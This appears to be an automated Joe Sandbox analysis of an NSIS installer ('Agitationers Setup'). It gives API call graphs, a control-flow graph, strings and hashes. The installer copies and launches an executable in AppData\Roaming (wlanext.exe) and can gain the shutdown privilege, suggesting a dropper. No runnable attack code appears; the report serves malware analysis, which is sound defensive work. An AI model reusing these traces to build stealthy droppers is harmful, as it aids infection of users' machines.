2988->2996 2989 40408b SendMessageA 2990 4051f5 OleUninitialize 2989->2990 2992->2989 2994 4040a3 2993->2994 2995 404094 SendMessageA 2993->2995 2994->2988 2995->2994 2998 401390 2996->2998 2997 4013fe 2997->2988 2998->2997 2999 4013cb MulDiv SendMessageA 2998->2999 2999->2998 4029 402688 4030 402904 4029->4030 4031 40268f 4029->4031 4032 402aa9 17 API calls 4031->4032 4033 402696 4032->4033 4034 4026a5 SetFilePointer 4033->4034 4034->4030 4035 4026b5 4034->4035 4037 405efe wsprintfA 4035->4037 4037->4030 4038 401c0a 4039 402aa9 17 API calls 4038->4039 4040 401c11 4039->4040 4041 402aa9 17 API calls 4040->4041 4042 401c1e 4041->4042 4043 401c33 4042->4043 4044 402acb 17 API calls 4042->4044 4045 402acb 17 API calls 4043->4045 4049 401c43 4043->4049 4044->4043 4045->4049 4046 401c9a 4048 402acb 17 API calls 4046->4048 4047 401c4e 4050 402aa9 17 API calls 4047->4050 4051 401c9f 4048->4051 4049->4046 4049->4047 4052 401c53 4050->4052 4053 402acb 17 API calls 4051->4053 4054 402aa9 17 API calls 4052->4054 4055 401ca8 FindWindowExA 4053->4055 4056 401c5f 4054->4056 4059 401cc6 4055->4059 4057 401c8a SendMessageA 4056->4057 4058 401c6c SendMessageTimeoutA 4056->4058 4057->4059 4058->4059 4060 40448a 4061 4044c0 4060->4061 4062 40449a 4060->4062 4064 4040a6 8 API calls 4061->4064 4063 40403f 18 API calls 4062->4063 4065 4044a7 SetDlgItemTextA 4063->4065 4066 4044cc 4064->4066 4065->4061 3246 40320c SetErrorMode GetVersion 3247 40324d 3246->3247 3248 403253 3246->3248 3249 406338 5 API calls 3247->3249 3250 4062ca 3 API calls 3248->3250 3249->3248 3251 403269 lstrlenA 3250->3251 3251->3248 3252 403278 3251->3252 3253 406338 5 API calls 3252->3253 3254 40327f 3253->3254 3255 406338 5 API calls 3254->3255 3256 403286 3255->3256 3257 406338 5 API calls 3256->3257 3258 403292 #17 OleInitialize SHGetFileInfoA 3257->3258 3336 405fa0 lstrcpynA 3258->3336 3261 4032de GetCommandLineA 3337 405fa0 lstrcpynA 3261->3337 3263 4032f0 3264 405963 CharNextA 3263->3264 3265 403319 CharNextA 3264->3265 3271 403329 3265->3271 3266 4033f3 3267 403406 GetTempPathA 3266->3267 3338 4031db 3267->3338 3269 40341e 3272 403422 GetWindowsDirectoryA lstrcatA 3269->3272 3273 403478 DeleteFileA 3269->3273 3270 405963 CharNextA 3270->3271 3271->3266 3271->3270 3276 4033f5 3271->3276 3275 4031db 12 API calls 3272->3275 3348 402d63 GetTickCount GetModuleFileNameA 3273->3348 3278 40343e 3275->3278 3440 405fa0 lstrcpynA 3276->3440 3277 40348c 3279 403522 3277->3279 3283 403512 3277->3283 3287 405963 CharNextA 3277->3287 3278->3273 3281 403442 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3278->3281 3457 4036f4 3279->3457 3282 4031db 12 API calls 3281->3282 3285 403470 3282->3285 3376 4037ce 3283->3376 3285->3273 3285->3279 3289 4034a7 3287->3289 3298 403552 3289->3298 3299 4034ed 3289->3299 3290 40365a 3292 403662 GetCurrentProcess OpenProcessToken 3290->3292 3293 4036dc ExitProcess 3290->3293 3291 40353c 3294 4056bc MessageBoxIndirectA 3291->3294 3295 4036ad 3292->3295 3296 40367d LookupPrivilegeValueA AdjustTokenPrivileges 3292->3296 3300 40354a ExitProcess 3294->3300 3301 406338 5 API calls 3295->3301 3296->3295 3303 405627 5 API calls 3298->3303 3441 405a26 3299->3441 3305 4036b4 3301->3305 3304 403557 lstrcatA 3303->3304 3307 403573 lstrcatA lstrcmpiA 3304->3307 3308 403568 lstrcatA 3304->3308 3309 4036c9 ExitWindowsEx 3305->3309 3312 4036d5 3305->3312 3307->3279 3311 40358f 3307->3311 3308->3307 3309->3293 3309->3312 3314 403594 3311->3314 3315 40359b 3311->3315 3316 40140b 2 API calls 3312->3316 3313 403507 3456 405fa0 lstrcpynA 3313->3456 3318 40558d 4 API calls 3314->3318 3319 40560a 2 API calls 3315->3319 3316->3293 3320 403599 3318->3320 3321 4035a0 SetCurrentDirectoryA 3319->3321 3320->3321 3322 4035ba 3321->3322 3323 4035af 3321->3323 3432 405fa0 lstrcpynA 3322->3432 3464 405fa0 lstrcpynA 3323->3464 3326 405fc2 17 API calls 3327 4035f9 DeleteFileA 3326->3327 3328 403606 CopyFileA 3327->3328 3333 4035c8 3327->3333 3328->3333 3329 40364e 3331 405d7f 36 API calls 3329->3331 3331->3279 3332 405fc2 17 API calls 3332->3333 3333->3326 3333->3329 3333->3332 3335 40363a CloseHandle 3333->3335 3433 405d7f MoveFileExA 3333->3433 3437 40563f CreateProcessA 3333->3437 3335->3333 3336->3261 3337->3263 3339 40620a 5 API calls 3338->3339 3341 4031e7 3339->3341 3340 4031f1 3340->3269 3341->3340 3342 405938 3 API calls 3341->3342 3343 4031f9 3342->3343 3344 40560a 2 API calls 3343->3344 3345 4031ff 3344->3345 3465 405b68 3345->3465 3469 405b39 GetFileAttributesA CreateFileA 3348->3469 3350 402da3 3369 402db3 3350->3369 3470 405fa0 lstrcpynA 3350->3470 3352 402dc9 3471 40597f lstrlenA 3352->3471 3356 402dda GetFileSize 3357 402ed6 3356->3357 3371 402df1 3356->3371 3476 402cff 3357->3476 3359 402edf 3361 402f0f GlobalAlloc 3359->3361 3359->3369 3488 4031c4 SetFilePointer 3359->3488 3360 4031ae ReadFile 3360->3371 3487 4031c4 SetFilePointer 3361->3487 3363 402f42 3366 402cff 6 API calls 3363->3366 3365 402f2a 3368 402f9c 31 API calls 3365->3368 3366->3369 3367 402ef8 3370 4031ae ReadFile 3367->3370 3374 402f36 3368->3374 3369->3277 3372 402f03 3370->3372 3371->3357 3371->3360 3371->3363 3371->3369 3373 402cff 6 API calls 3371->3373 3372->3361 3372->3369 3373->3371 3374->3369 3374->3374 3375 402f73 SetFilePointer 3374->3375 3375->3369 3377 406338 5 API calls 3376->3377 3378 4037e2 3377->3378 3379 4037e8 3378->3379 3380 4037fa 3378->3380 3501 405efe wsprintfA 3379->3501 3381 405e87 3 API calls 3380->3381 3382 403825 3381->3382 3384 403843 lstrcatA 3382->3384 3386 405e87 3 API calls 3382->3386 3385 4037f8 3384->3385 3493 403a93 3385->3493 3386->3384 3389 405a26 18 API calls 3390 403875 3389->3390 3391 4038fe 3390->3391 3393 405e87 3 API calls 3390->3393 3392 405a26 18 API calls 3391->3392 3394 403904 3392->3394 3395 4038a1 3393->3395 3396 403914 LoadImageA 3394->3396 3397 405fc2 17 API calls 3394->3397 3395->3391 3400 4038bd lstrlenA 3395->3400 3403 405963 CharNextA 3395->3403 3398 4039ba 3396->3398 3399 40393b RegisterClassA 3396->3399 3397->3396 3402 40140b 2 API calls 3398->3402 3401 403971 SystemParametersInfoA CreateWindowExA 3399->3401 3431 4039c4 3399->3431 3404 4038f1 3400->3404 3405 4038cb lstrcmpiA 3400->3405 3401->3398 3406 4039c0 3402->3406 3408 4038bb 3403->3408 3407 405938 3 API calls 3404->3407 3405->3404 3409 4038db GetFileAttributesA 3405->3409 3410 403a93 18 API calls 3406->3410 3406->3431 3411 4038f7 3407->3411 3408->3400 3412 4038e7 3409->3412 3413 4039d1 3410->3413 3502 405fa0 lstrcpynA 3411->3502 3412->3404 3415 40597f 2 API calls 3412->3415 3416 403a60 3413->3416 3417 4039dd ShowWindow 3413->3417 3415->3404 3419 405199 5 API calls 3416->3419 3418 4062ca 3 API calls 3417->3418 3421 4039f5 3418->3421 3420 403a66 3419->3420 3422 403a82 3420->3422 3423 403a6a 3420->3423 3424 403a03 GetClassInfoA 3421->3424 3426 4062ca 3 API calls 3421->3426 3425 40140b 2 API calls 3422->3425 3429 40140b 2 API calls 3423->3429 3423->3431 3427 403a17 GetClassInfoA RegisterClassA 3424->3427 3428 403a2d DialogBoxParamA 3424->3428 3425->3431 3426->3424 3427->3428 3430 40140b 2 API calls 3428->3430 3429->3431 3430->3431 3431->3279 3432->3333 3434 405da0 3433->3434 3435 405d93 3433->3435 3434->3333 3504 405c0f 3435->3504 3438 405672 CloseHandle 3437->3438 3439 40567e 3437->3439 3438->3439 3439->3333 3440->3267 3538 405fa0 lstrcpynA 3441->3538 3443 405a37 3444 4059d1 4 API calls 3443->3444 3445 405a3d 3444->3445 3446 4034f8 3445->3446 3447 40620a 5 API calls 3445->3447 3446->3279 3455 405fa0 lstrcpynA 3446->3455 3453 405a4d 3447->3453 3448 405a78 lstrlenA 3449 405a83 3448->3449 3448->3453 3451 405938 3 API calls 3449->3451 3450 4062a3 2 API calls 3450->3453 3452 405a88 GetFileAttributesA 3451->3452 3452->3446 3453->3446 3453->3448 3453->3450 3454 40597f 2 API calls 3453->3454 3454->3448 3455->3313 3456->3283 3458 40370c 3457->3458 3459 4036fe CloseHandle 3457->3459 3539 403739 3458->3539 3459->3458 3464->3322 3466 405b73 GetTickCount GetTempFileNameA 3465->3466 3467 405ba0 3466->3467 3468 40320a 3466->3468 3467->3466 3467->3468 3468->3269 3469->3350 3470->3352 3472 40598c 3471->3472 3473 405991 CharPrevA 3472->3473 3474 402dcf 3472->3474 3473->3472 3473->3474 3475 405fa0 lstrcpynA 3474->3475 3475->3356 3477 402d20 3476->3477 3478 402d08 3476->3478 3479 402d30 GetTickCount 3477->3479 3480 402d28 3477->3480 3481 402d11 DestroyWindow 3478->3481 3482 402d18 3478->3482 3484 402d61 3479->3484 3485 402d3e CreateDialogParamA ShowWindow 3479->3485 3489 406374 3480->3489 3481->3482 3482->3359 3484->3359 3485->3484 3487->3365 3488->3367 3490 406391 PeekMessageA 3489->3490 3491 402d2e 3490->3491 3492 406387 DispatchMessageA 3490->3492 3491->3359 3492->3490 3494 403aa7 3493->3494 3503 405efe wsprintfA 3494->3503 3496 403b18 3497 403b4c 18 API calls 3496->3497 3499 403b1d 3497->3499 3498 403853 3498->3389 3499->3498 3500 405fc2 17 API calls 3499->3500 3500->3499 3501->3385 3502->3391 3503->3496 3505 405c35 3504->3505 3506 405c5b GetShortPathNameA 3504->3506 3531 405b39 GetFileAttributesA CreateFileA 3505->3531 3508 405c70 3506->3508 3509 405d7a 3506->3509 3508->3509 3511 405c78 wsprintfA 3508->3511 3509->3434 3510 405c3f CloseHandle GetShortPathNameA 3510->3509 3512 405c53 3510->3512 3513 405fc2 17 API calls 3511->3513 3512->3506 3512->3509 3514 405ca0 3513->3514 3532 405b39 GetFileAttributesA CreateFileA 3514->3532 3516 405cad 3516->3509 3517 405cbc GetFileSize GlobalAlloc 3516->3517 3518 405d73 CloseHandle 3517->3518 3519 405cde 3517->3519 3518->3509 3520 405bb1 ReadFile 3519->3520 3521 405ce6 3520->3521 3521->3518 3533 405a9e lstrlenA 3521->3533 3524 405d11 3526 405a9e 4 API calls 3524->3526 3525 405cfd lstrcpyA 3527 405d1f 3525->3527 3526->3527 3528 405d56 SetFilePointer 3527->3528 3529 405be0 WriteFile 3528->3529 3530 405d6c GlobalFree 3529->3530 3530->3518 3531->3510 3532->3516 3534 405adf lstrlenA 3533->3534 3535 405ab8 lstrcmpiA 3534->3535 3536 405ae7 3534->3536 3535->3536 3537 405ad6 CharNextA 3535->3537 3536->3524 3536->3525 3537->3534 3538->3443 3540 403747 3539->3540 3541 403711 3540->3541 3542 40374c FreeLibrary GlobalFree 3540->3542 3543 405768 3541->3543 3542->3541 3542->3542 3544 405a26 18 API calls 3543->3544 3545 405788 3544->3545 3546 405790 DeleteFileA 3545->3546 3547 4057a7 3545->3547 3551 40352b OleUninitialize 3546->3551 3548 4058d5 3547->3548 3580 405fa0 lstrcpynA 3547->3580 3548->3551 3554 4062a3 2 API calls 3548->3554 3550 4057cd 3552 4057e0 3550->3552 3553 4057d3 lstrcatA 3550->3553 3551->3290 3551->3291 3556 40597f 2 API calls 3552->3556 3555 4057e6 3553->3555 3557 4058f9 3554->3557 3558 4057f4 lstrcatA 3555->3558 3559 4057ff lstrlenA FindFirstFileA 3555->3559 3556->3555 3557->3551 3560 405938 3 API calls 3557->3560 3558->3559 3559->3548 3578 405823 3559->3578 3561 405903 3560->3561 3563 405720 5 API calls 3561->3563 3562 405963 CharNextA 3562->3578 3564 40590f 3563->3564 3565 405913 3564->3565 3566 405929 3564->3566 3565->3551 3571 4050c7 24 API calls 3565->3571 3567 4050c7 24 API calls 3566->3567 3567->3551 3568 4058b4 FindNextFileA 3570 4058cc FindClose 3568->3570 3568->3578 3570->3548 3572 405920 3571->3572 3573 405d7f 36 API calls 3572->3573 3573->3551 3575 405768 60 API calls 3575->3578 3576 4050c7 24 API calls 3576->3568 3577 4050c7 24 API calls 3577->3578 3578->3562 3578->3568 3578->3575 3578->3576 3578->3577 3579 405d7f 36 API calls 3578->3579 3581 405fa0 lstrcpynA 3578->3581 3582 405720 3578->3582 3579->3578 3580->3550 3581->3578 3583 405b14 2 API calls 3582->3583 3584 40572c 3583->3584 3585 405743 DeleteFileA 3584->3585 3586 40573b RemoveDirectoryA 3584->3586 3587 40574d 3584->3587 3588 405749 3585->3588 3586->3588 3587->3578 3588->3587 3589 405759 SetFileAttributesA 3588->3589 3589->3587 4067 40378c 4068 403797 4067->4068 4069 40379b 4068->4069 4070 40379e GlobalAlloc 4068->4070 4070->4069 4071 401490 4072 4050c7 24 API calls 4071->4072 4073 401497 4072->4073 4074 401d9b GetDC 4075 402aa9 17 API calls 4074->4075 4076 401dad GetDeviceCaps MulDiv ReleaseDC 4075->4076 4077 402aa9 17 API calls 4076->4077 4078 401dde 4077->4078 4079 405fc2 17 API calls 4078->4079 4080 401e1b CreateFontIndirectA 4079->4080 4081 40257d 4080->4081 4082 40149d 4083 4022e7 4082->4083 4084 4014ab PostQuitMessage 4082->4084 4084->4083 4085 40159d 4086 402acb 17 API calls 4085->4086 4087 4015a4 SetFileAttributesA 4086->4087 4088 4015b6 4087->4088 4089 401a1e 4090 402acb 17 API calls 4089->4090 4091 401a27 ExpandEnvironmentStringsA 4090->4091 4092 401a3b 4091->4092 4094 401a4e 4091->4094 4093 401a40 lstrcmpA 4092->4093 4092->4094 4093->4094 4100 40171f 4101 402acb 17 API calls 4100->4101 4102 401726 SearchPathA 4101->4102 4103 401741 4102->4103 4104 401d20 4105 402aa9 17 API calls 4104->4105 4106 401d2e SetWindowLongA 4105->4106 4107 402957 4106->4107 4108 404822 4109 404832 4108->4109 4110 40484e 4108->4110 4119 4056a0 GetDlgItemTextA 4109->4119 4112 404881 4110->4112 4113 404854 SHGetPathFromIDListA 4110->4113 4115 404864 4113->4115 4118 40486b SendMessageA 4113->4118 4114 40483f SendMessageA 4114->4110 4116 40140b 2 API calls 4115->4116 4116->4118 4118->4112 4119->4114 4120 4041aa 4121 4041c0 4120->4121 4126 4042cc 4120->4126 4124 40403f 18 API calls 4121->4124 4122 40433b 4123 404405 4122->4123 4125 404345 GetDlgItem 4122->4125 4132 4040a6 8 API calls 4123->4132 4127 404216 4124->4127 4128 4043c3 4125->4128 4129 40435b 4125->4129 4126->4122 4126->4123 4130 404310 GetDlgItem SendMessageA 4126->4130 4131 40403f 18 API calls 4127->4131 4128->4123 4135 4043d5 4128->4135 4129->4128 4134 404381 SendMessageA LoadCursorA SetCursor 4129->4134 4153 404061 KiUserCallbackDispatcher 4130->4153 4137 404223 CheckDlgButton 4131->4137 4133 404400 4132->4133 4154 40444e 4134->4154 4139 4043db SendMessageA 4135->4139 4140 4043ec 4135->4140 4151 404061 KiUserCallbackDispatcher 4137->4151 4139->4140 4140->4133 4145 4043f2 SendMessageA 4140->4145 4141 404336 4146 40442a SendMessageA 4141->4146 4143 404241 GetDlgItem 4152 404074 SendMessageA 4143->4152 4145->4133 4146->4122 4148 404257 SendMessageA 4149 404275 GetSysColor 4148->4149 4150 40427e SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4148->4150 4149->4150 4150->4133 4151->4143 4152->4148 4153->4141 4157 405682 ShellExecuteExA 4154->4157 4156 4043b4 LoadCursorA SetCursor 4156->4128 4157->4156 3187 401e2b 3188 402aa9 17 API calls 3187->3188 3189 401e31 3188->3189 3190 402aa9 17 API calls 3189->3190 3191 401e3d 3190->3191 3192 401e54 EnableWindow 3191->3192 3193 401e49 ShowWindow 3191->3193 3194 402957 3192->3194 3193->3194 4158 4063ad WaitForSingleObject 4159 4063c7 4158->4159 4160 4063d9 GetExitCodeProcess 4159->4160 4161 406374 2 API calls 4159->4161 4162 4063ce WaitForSingleObject 4161->4162 4162->4159 4163 401f31 4164 402acb 17 API calls 4163->4164 4165 401f38 4164->4165 4166 4062a3 2 API calls 4165->4166 4167 401f3e 4166->4167 4168 401f50 4167->4168 4170 405efe wsprintfA 4167->4170 4170->4168 4177 402932 SendMessageA 4178 402957 4177->4178 4179 40294c InvalidateRect 4177->4179 4179->4178 4180 4014b7 4181 4014bd 4180->4181 4182 401389 2 API calls 4181->4182 4183 4014c5 4182->4183 4184 4026ba 4185 4026c0 4184->4185 4186 402957 4185->4186 4187 4026c8 FindClose 4185->4187 4187->4186 3195 4015bb 3196 402acb 17 API calls 3195->3196 3197 4015c2 3196->3197 3215 4059d1 CharNextA CharNextA 3197->3215 3199 4015ca 3200 401624 3199->3200 3202 405963 CharNextA 3199->3202 3211 4015f3 3199->3211 3212 40160c GetFileAttributesA 3199->3212 3225 405627 3199->3225 3233 40560a CreateDirectoryA 3199->3233 3201 401629 3200->3201 3204 401652 3200->3204 3221 401423 3201->3221 3202->3199 3206 401423 24 API calls 3204->3206 3213 40164a 3206->3213 3210 40163b SetCurrentDirectoryA 3210->3213 3211->3199 3228 40558d CreateDirectoryA 3211->3228 3212->3199 3216 4059ec 3215->3216 3220 4059fc 3215->3220 3218 4059f7 CharNextA 3216->3218 3216->3220 3217 405a1c 3217->3199 3218->3217 3219 405963 CharNextA 3219->3220 3220->3217 3220->3219 3222 4050c7 24 API calls 3221->3222 3223 401431 3222->3223 3224 405fa0 lstrcpynA 3223->3224 3224->3210 3226 406338 5 API calls 3225->3226 3227 40562e 3226->3227 3227->3199 3229 4055de GetLastError 3228->3229 3230 4055da 3228->3230 3229->3230 3231 4055ed SetFileSecurityA 3229->3231 3230->3211 3231->3230 3232 405603 GetLastError 3231->3232 3232->3230 3234 40561a 3233->3234 3235 40561e GetLastError 3233->3235 3234->3199 3235->3234 4188 40503b 4189 40504b 4188->4189 4190 40505f 4188->4190 4191 405051 4189->4191 4200 4050a8 4189->4200 4192 405067 IsWindowVisible 4190->4192 4196 40507e 4190->4196 4194 40408b SendMessageA 4191->4194 4195 405074 4192->4195 4192->4200 4193 4050ad CallWindowProcA 4197 40505b 4193->4197 4194->4197 4198 404992 5 API calls 4195->4198 4196->4193 4199 404a12 4 API calls 4196->4199 4198->4196 4199->4200 4200->4193 4201 4016bb 4202 402acb 17 API calls 4201->4202 4203 4016c1 GetFullPathNameA 4202->4203 4204 4016d8 4203->4204 4210 4016f9 4203->4210 4207 4062a3 2 API calls 4204->4207 4204->4210 4205 402957 4206 40170d GetShortPathNameA 4206->4205 4208 4016e9 4207->4208 4208->4210 4211 405fa0 lstrcpynA 4208->4211 4210->4205 4210->4206 4211->4210 4212 40273c 4213 402acb 17 API calls 4212->4213 4215 40274a 4213->4215 4214 402760 4216 405b14 2 API calls 4214->4216 4215->4214 4217 402acb 17 API calls 4215->4217 4218 402766 4216->4218 4217->4214 4240 405b39 GetFileAttributesA CreateFileA 4218->4240 4220 402773 4221 40281c 4220->4221 4222 40277f GlobalAlloc 4220->4222 4225 402824 DeleteFileA 4221->4225 4226 402837 4221->4226 4223 402813 CloseHandle 4222->4223 4224 402798 4222->4224 4223->4221 4241 4031c4 SetFilePointer 4224->4241 4225->4226 4228 40279e 4229 4031ae ReadFile 4228->4229 4230 4027a7 GlobalAlloc 4229->4230 4231 4027f1 4230->4231 4232 4027b7 4230->4232 4233 405be0 WriteFile 4231->4233 4234 402f9c 31 API calls 4232->4234 4235 4027fd GlobalFree 4233->4235 4239 4027c4 4234->4239 4236 402f9c 31 API calls 4235->4236 4238 402810 4236->4238 4237 4027e8 GlobalFree 4237->4231 4238->4223 4239->4237 4240->4220 4241->4228 4242 401b3f 4243 402acb 17 API calls 4242->4243 4244 401b46 4243->4244 4245 402aa9 17 API calls 4244->4245 4246 401b4f wsprintfA 4245->4246 4247 402957 4246->4247

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 40320c-40324b SetErrorMode GetVersion 1 40324d-403255 call 406338 0->1 2 40325e 0->2 1->2 7 403257 1->7 4 403263-403276 call 4062ca lstrlenA 2->4 9 403278-403294 call 406338 * 3 4->9 7->2 16 4032a5-403303 #17 OleInitialize SHGetFileInfoA call 405fa0 GetCommandLineA call 405fa0 9->16 17 403296-40329c 9->17 24 403305-40330a 16->24 25 40330f-403324 call 405963 CharNextA 16->25 17->16 21 40329e 17->21 21->16 24->25 28 4033e9-4033ed 25->28 29 4033f3 28->29 30 403329-40332c 28->30 33 403406-403420 GetTempPathA call 4031db 29->33 31 403334-40333c 30->31 32 40332e-403332 30->32 34 403344-403347 31->34 35 40333e-40333f 31->35 32->31 32->32 43 403422-403440 GetWindowsDirectoryA lstrcatA call 4031db 33->43 44 403478-403492 DeleteFileA call 402d63 33->44 37 4033d9-4033e6 call 405963 34->37 38 40334d-403351 34->38 35->34 37->28 53 4033e8 37->53 41 403353-403359 38->41 42 403369-403396 38->42 47 40335b-40335d 41->47 48 40335f 41->48 49 403398-40339e 42->49 50 4033a9-4033d7 42->50 43->44 61 403442-403472 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031db 43->61 58 403526-403536 call 4036f4 OleUninitialize 44->58 59 403498-40349e 44->59 47->42 47->48 48->42 55 4033a0-4033a2 49->55 56 4033a4 49->56 50->37 52 4033f5-403401 call 405fa0 50->52 52->33 53->28 55->50 55->56 56->50 72 40365a-403660 58->72 73 40353c-40354c call 4056bc ExitProcess 58->73 63 4034a0-4034ab call 405963 59->63 64 403516-40351d call 4037ce 59->64 61->44 61->58 76 4034e1-4034eb 63->76 77 4034ad-4034d6 63->77 70 403522 64->70 70->58 74 403662-40367b GetCurrentProcess OpenProcessToken 72->74 75 4036dc-4036e4 72->75 79 4036ad-4036bb call 406338 74->79 80 40367d-4036a7 LookupPrivilegeValueA AdjustTokenPrivileges 74->80 82 4036e6 75->82 83 4036ea-4036ee ExitProcess 75->83 84 403552-403566 call 405627 lstrcatA 76->84 85 4034ed-4034fa call 405a26 76->85 81 4034d8-4034da 77->81 97 4036c9-4036d3 ExitWindowsEx 79->97 98 4036bd-4036c7 79->98 80->79 81->76 88 4034dc-4034df 81->88 82->83 95 403573-40358d lstrcatA lstrcmpiA 84->95 96 403568-40356e lstrcatA 84->96 85->58 94 4034fc-403512 call 405fa0 * 2 85->94 88->76 88->81 94->64 95->58 100 40358f-403592 95->100 96->95 97->75 101 4036d5-4036d7 call 40140b 97->101 98->97 98->101 103 403594-403599 call 40558d 100->103 104 40359b call 40560a 100->104 101->75 112 4035a0-4035ad SetCurrentDirectoryA 103->112 104->112 113 4035ba-4035e2 call 405fa0 112->113 114 4035af-4035b5 call 405fa0 112->114 118 4035e8-403604 call 405fc2 DeleteFileA 113->118 114->113 121 403645-40364c 118->121 122 403606-403616 CopyFileA 118->122 121->118 124 40364e-403655 call 405d7f 121->124 122->121 123 403618-403631 call 405d7f call 405fc2 call 40563f 122->123 132 403636-403638 123->132 124->58 132->121 133 40363a-403641 CloseHandle 132->133 133->121
                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 00403231
                                                          • GetVersion.KERNEL32 ref: 00403237
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040326A
                                                          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032A6
                                                          • OleInitialize.OLE32(00000000), ref: 004032AD
                                                          • SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032C9
                                                          • GetCommandLineA.KERNEL32(Agitationers Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032DE
                                                          • CharNextA.USER32(00000000), ref: 0040331A
                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403417
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403428
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403434
                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 00403448
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403450
                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403461
                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403469
                                                          • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040347D
                                                            • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                                            • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?,?,?,0040327F,0000000A), ref: 00406365
                                                            • Part of subcall function 004037CE: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank,1033,Agitationers Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Agitationers Setup: Completed,00000000,00000002,75712754), ref: 004038BE
                                                            • Part of subcall function 004037CE: lstrcmpiA.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank,1033,Agitationers Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Agitationers Setup: Completed,00000000), ref: 004038D1
                                                            • Part of subcall function 004037CE: GetFileAttributesA.KERNEL32(: Completed), ref: 004038DC
                                                            • Part of subcall function 004037CE: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank), ref: 00403925
                                                            • Part of subcall function 004037CE: RegisterClassA.USER32(0042EBA0), ref: 00403962
                                                            • Part of subcall function 004036F4: CloseHandle.KERNEL32(0000018C), ref: 004036FF
                                                          • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040352B
                                                          • ExitProcess.KERNEL32 ref: 0040354C
                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403669
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403670
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403688
                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A7
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004036CB
                                                          • ExitProcess.KERNEL32 ref: 004036EE
                                                            • Part of subcall function 004056BC: MessageBoxIndirectA.USER32 ref: 00405717
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                          • String ID: "$"C:\Users\user\AppData\Roaming\wlanext.exe" $.tmp$1033$Agitationers Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank$C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd$C:\Users\user\AppData\Roaming\wlanext.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Triu,fe$$UXTHEME$\Temp$~nsu
                                                          • API String ID: 3776617018-2630423181
                                                          • Opcode ID: aa8e0ef1eb72b8bc744683be083ef578b0b61129bd2ec06390cc6719ef15a54d
                                                          • Instruction ID: 947ab88924f8c3b38e2aea5cfaab7316d1dfac26a51a196f62222c0ed64aafcd
                                                          • Opcode Fuzzy Hash: aa8e0ef1eb72b8bc744683be083ef578b0b61129bd2ec06390cc6719ef15a54d
